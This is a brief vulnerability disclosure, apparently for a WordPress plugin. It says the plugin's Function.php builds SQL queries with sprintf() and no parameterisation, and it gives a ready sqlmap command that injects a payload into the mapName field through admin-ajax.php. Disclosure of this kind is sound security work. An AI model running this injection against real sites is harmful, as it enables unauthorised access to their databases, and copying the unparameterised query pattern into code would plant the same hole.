The Function.php file uses sprintf() to format queries being sent to the database, this doesn’t provide proper sanitisation of user input or properly parameterises the query.
$ sqlmap -u ‘http://www.example.com/wp-admin/admin-ajax.php’ --data=“mapID=11&mapName;='+or+1%3D%3D1%3B&action;=e2m_img_save_map_name” --cookie=COOKIE HERE --level=5 --risk=3